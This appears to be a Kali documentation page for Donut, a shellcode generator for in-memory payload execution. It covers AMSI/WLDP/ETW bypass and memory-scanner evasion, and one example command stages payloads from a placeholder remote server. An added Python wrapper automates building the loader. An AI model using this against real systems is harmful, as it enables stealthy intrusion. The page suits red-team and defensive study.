Tags: Exploitation, shellcode, position-independent, in-memory-execution, encryption, bypass, amsi, wldp

Donut Shellcode

Donut generates position-independent shellcode that enables in-memory execution of VBScript, JScript, EXE, DLL files, and dotNET assemblies. Modules can be staged from HTTP servers or embedded, with optional encryption and features like AMSI/WLDP patching.

Description

Donut is a shellcode generator designed for in-memory execution of various file types including VBScript, JScript, EXEs, DLLs, and .NET assemblies without writing to disk. It supports HTTP staging of modules or direct embedding in the loader, with optional Chaskey block cipher encryption using a 128-bit random key. After execution, original file references are erased to evade memory scanners.

Key use cases include red team operations where payload delivery must evade detection. Donut compresses inputs with aPLib, LZNT1, Xpress, or Xpress Huffman, applies entropy to API hashes and strings, patches AMSI and WLDP, rewrites the command line seen by EXEs, and controls exit behaviour so a payload that calls an exit API does not tear down the host process. Output formats include binary, Base64, C, Ruby, Python, PowerShell, C#, and hexadecimal.

The tool targets x86, amd64, or both architectures, with options for forking threads, specifying .NET classes/methods, and passing arguments. It supports preserving PE headers, decoy modules for evasion, and configurable bypass levels for AMSI/WLDP/ETW.

How It Works

Donut builds a position-independent code (PIC) loader that decodes and runs the input file entirely in memory. The input can optionally be compressed with aPLib or with the Windows compressors (LZNT1, Xpress, Xpress Huffman) via RtlCompressBuffer, given entropy (random module and AppDomain names, hashed API names, randomised strings) and encrypted with the 128-bit Chaskey block cipher. For .NET assemblies the loader hosts the CLR, creates an AppDomain and invokes the requested class and method; for unmanaged EXEs and DLLs it maps the image into the host process and runs the entry point (or a named export) directly. At run time it patches AMSI and WLDP (and optionally ETW), adjusts the command line for EXEs, and hooks the exit APIs so the payload cannot terminate the host process or thread unless that is the configured exit behaviour. With HTTP staging the loader fetches the encrypted module from the server, decrypts it in memory, and erases the module after execution to frustrate memory scanners.

Installation

```bash
sudo apt install donut
```

Flags

-n,--modname    Module name for HTTP staging. If entropy is enabled, this is generated randomly.
-s,--server     Server that will host the Donut module. Credentials may be provided in the following format: https://username:[email protected]/
-e,--entropy    Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)
-a,--arch       Target architecture: 1=x86, 2=amd64, 3=x86+amd64 (default).
-o,--output     Output file to save loader. Default is "loader.bin"
-f,--format     Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex
-y,--fork       Create a new thread for the loader and continue execution at <offset> relative to the host process's executable.
-x,--exit       Exit behaviour. 1=Exit thread (default), 2=Exit process, 3=Do not exit or cleanup and block indefinitely
-c,--class      Optional class name. (required for .NET DLL, format: namespace.class)
-m,--method     Optional method or function for DLL. (a method is required for .NET DLL)
-i,--input      Input file to execute in-memory.
-p,--args       Optional parameters/command line inside quotations for DLL method/function or EXE.
-z,--compress   Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman [experimental]
-b,--bypass     Bypass AMSI/WLDP/ETW: 1=None, 2=Abort on fail, 3=Continue on fail (default).

Examples

Generate shellcode for the c2.dll input file with default options (both architectures, full entropy and encryption, bypass continues on failure).

```bash
donut -i c2.dll
```

Generate x86 shellcode for the .NET DLL loader.dll, invoking TestClass.RunProcess with the argument notepad.exe.

```bash
donut --arch:x86 --class:TestClass --method:RunProcess --args:notepad.exe --input:loader.dll
```

Generate shellcode for loader.dll using TestClass.RunProcess with the arguments calc notepad, staging the encrypted module from an HTTP server rather than embedding it.

```bash
donut -i loader.dll -c TestClass -m RunProcess -p "calc notepad" -s http://remote_server.com/modules/
```

Default generation of shellcode for an EXE file (the input may be given as the last positional argument).

```bash
donut example.exe
```

Generate Base64-encoded shellcode for a DLL.

```bash
donut -f 2 example.dll
```

Generate amd64 shellcode with full entropy and encryption, continuing on AMSI/WLDP bypass failure.

```bash
donut -e 3 -b 3 -a 2 example.dll
```
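When a loader has to be regenerated often (different architectures, output formats or staging servers per engagement), it is easy to drop the `-c`/`-m` pair a .NET DLL needs or to leak the staging credentials from `-s` into shell history and build logs. The script below is an added example, not part of Donut or the Kali page: it maps readable option names onto the numeric levels in the Flags section, enforces the constraints the page states before spawning `donut`, and redacts any password embedded in the server URL when reporting the command. The file names, the server URL and the `DonutJob` helper are assumptions for illustration; the `donut` binary is expected on `PATH` only when `run_donut` is actually called.

```python
#!/usr/bin/env python3
"""Added example: build, validate and (optionally) run a donut command line.

Not donut's own code. It only wraps the donut CLI flags listed on this page;
file names and the staging URL in the usage section are made-up placeholders.
"""
import shutil
import subprocess
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional
from urllib.parse import urlsplit, urlunsplit

# Numeric levels exactly as documented for -a, -e, -b, -x and -f.
ARCH = {"x86": 1, "amd64": 2, "both": 3}
ENTROPY = {"none": 1, "names": 2, "full": 3}
BYPASS = {"none": 1, "abort": 2, "continue": 3}
EXIT = {"thread": 1, "process": 2, "block": 3}
FORMAT = {"bin": 1, "base64": 2, "c": 3, "ruby": 4, "python": 5,
          "powershell": 6, "csharp": 7, "hex": 8}


@dataclass
class DonutJob:
    """One loader build. Names are hypothetical wrappers around donut flags."""
    input: str
    output: str = "loader.bin"
    arch: str = "both"
    entropy: str = "full"
    bypass: str = "continue"
    exit_mode: str = "thread"
    fmt: str = "bin"
    cls: Optional[str] = None       # -c, namespace.class for .NET DLLs
    method: Optional[str] = None    # -m, .NET method or unmanaged export
    args: Optional[str] = None      # -p, command line / method parameters
    server: Optional[str] = None    # -s, HTTP staging base URL
    dotnet: bool = False            # input is a .NET assembly


def build_argv(job: DonutJob) -> List[str]:
    """Translate a job into donut argv, enforcing the page-stated constraints."""
    if job.dotnet and job.input.lower().endswith(".dll") and not (job.cls and job.method):
        raise ValueError("a .NET DLL requires both --class and --method")
    if job.server and not job.server.startswith(("http://", "https://")):
        raise ValueError("staging server must be an http(s) URL")
    argv = ["donut", "-i", job.input, "-o", job.output,
            "-a", str(ARCH[job.arch]), "-e", str(ENTROPY[job.entropy]),
            "-b", str(BYPASS[job.bypass]), "-x", str(EXIT[job.exit_mode]),
            "-f", str(FORMAT[job.fmt])]
    if job.cls:
        argv += ["-c", job.cls]
    if job.method:
        argv += ["-m", job.method]
    if job.args:
        argv += ["-p", job.args]          # subprocess passes it as one argument
    if job.server:
        argv += ["-s", job.server]
    return argv


def redact_url(url: str) -> str:
    """Mask the password in https://user:pass@host/ before logging a command."""
    parts = urlsplit(url)
    if parts.password is None:
        return url
    host = parts.hostname or ""
    if parts.port:
        host += f":{parts.port}"
    return urlunsplit(parts._replace(netloc=f"{parts.username}:***@{host}"))


def printable(argv: List[str]) -> str:
    """Command line safe to echo into a build log (credentials redacted)."""
    return " ".join(redact_url(a) if a.startswith(("http://", "https://")) else a
                    for a in argv)


def run_donut(job: DonutJob) -> Path:
    """Run donut and return the output path, failing loudly on an empty loader."""
    if shutil.which("donut") is None:
        raise RuntimeError("donut not found on PATH (apt install donut)")
    argv = build_argv(job)
    print("+", printable(argv))
    subprocess.run(argv, check=True)
    out = Path(job.output)
    if not out.is_file() or out.stat().st_size == 0:
        raise RuntimeError(f"donut produced no loader at {out}")
    return out


if __name__ == "__main__":
    # Placeholder names: the staging example from this page, with credentials.
    job = DonutJob(input="loader.dll", dotnet=True, arch="amd64",
                   cls="TestClass", method="RunProcess", args="calc notepad",
                   server="https://operator:s3cret@remote_server.com/modules/")
    print(printable(build_argv(job)))
    # run_donut(job)  # uncomment on a box with donut installed
```

The validation in `build_argv` is the part worth keeping even if you drop the rest: donut itself will refuse a .NET DLL without a method, but catching it before the build step makes automated pipelines fail fast, and `printable` is what should go into any log, never the raw `argv` when `-s` carries credentials.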
Updated 2026-04-16, kali.org